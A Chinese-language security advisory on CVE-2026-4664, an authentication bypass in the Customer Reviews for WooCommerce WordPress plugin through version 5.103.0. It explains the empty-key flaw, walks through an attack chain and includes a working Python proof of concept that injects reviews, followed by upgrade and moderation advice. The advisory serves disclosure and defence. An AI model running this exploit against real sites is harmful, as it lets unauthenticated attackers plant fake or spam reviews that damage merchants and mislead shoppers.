IPBUF安全漏洞报告
English
CVE-2026-4664 CVSS 5.3 中危

CVE-2026-4664 WooCommerce插件认证绕过漏洞

披露日期: 2026-04-10
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-4664
漏洞类型
认证绕过
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Customer Reviews for WooCommerce

相关标签

认证绕过WordPressWooCommerceCVE-2026-4664插件漏洞

漏洞概述

WordPress的Customer Reviews for WooCommerce插件在5.103.0及之前版本存在认证绕过漏洞。该插件在权限校验时未正确处理空密钥情况,导致未经身份验证的攻击者可利用空字符串绕过权限检查。攻击者可通过REST API端点提交、修改或注入任意产品的评论,且默认设置下评论将自动批准,严重影响电商网站信誉。

技术细节

该漏洞位于`includes/reviews/class-cr-endpoint.php`文件的`create_review_permissions_check()`函数中。插件使用严格比较运算符(`===`)来验证用户提供的`key`参数与数据库中存储的`ivole_secret_key`是否一致。然而,代码未验证存储的密钥是否为非空值。对于尚未发送评论提醒邮件的订单,`ivole_secret_key`元数据并不存在,导致`get_meta()`返回空字符串。攻击者只需在请求中提交一个空的`key`参数(即`key: ""`),即可通过严格匹配校验,成功绕过身份认证。利用此漏洞,攻击者可向`POST /ivole/v1/review`端点发送恶意请求,为任意产品(包括无关产品)创建或修改评论。鉴于插件默认开启自动批准功能(`ivole_enable_moderation`为"no"),这些注入的虚假评论将直接显示在前台,破坏网站数据的完整性。

攻击链分析

STEP 1
侦察
攻击者识别目标WordPress网站是否安装了易受攻击版本的Customer Reviews for WooCommerce插件(<= 5.103.0)。
STEP 2
漏洞利用
攻击者向`/wp-json/ivole/v1/review` REST API端点发送POST请求,并在请求体中构造一个空的`key`参数(`key: ""`)。
STEP 3
权限绕过
服务器端的`create_review_permissions_check()`函数将空的`key`与不存在的`ivole_secret_key`(返回空字符串)进行严格比较,匹配成功从而绕过身份验证。
STEP 4
注入评论
攻击者提交包含恶意内容、虚假评分或垃圾链接的评论数据。由于插件默认自动批准评论,该内容直接发布到网站上。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def exploit_cve_2026_4664(target_url): """ PoC for CVE-2026-4664 Authentication Bypass in Customer Reviews for WooCommerce. This script attempts to inject a review using an empty key. """ endpoint = f"{target_url}/wp-json/ivole/v1/review" headers = { "Content-Type": "application/json" } # Payload exploiting the empty key bypass payload = { "key": "", # The empty string bypasses the strict check against an empty meta value "product_id": 1, # Target product ID "rating": 5, "title": "Great Product", "review": "This is a fake review injected via CVE-2026-4664 PoC.", "name": "Attacker", "email": "[email protected]" } try: response = requests.post(endpoint, json=payload, headers=headers, timeout=10) if response.status_code == 200: print("[+] Exploit successful! Review likely submitted.") print(f"[+] Response: {response.text}") else: print(f"[-] Exploit failed. Status code: {response.status_code}") print(f"[-] Response: {response.text}") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": # Replace with the actual target URL target = "http://example.com" exploit_cve_2026_4664(target)

影响范围

Customer Reviews for WooCommerce <= 5.103.0

防御指南

临时缓解措施
建议立即将插件升级至5.104.0及以上版本以修复此漏洞。若暂时无法升级,请禁用插件或限制对REST API的访问。管理员应审查近期所有通过该插件提交的评论,删除可疑内容,并确保开启了评论审核机制,防止未经授权的评论自动发布。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表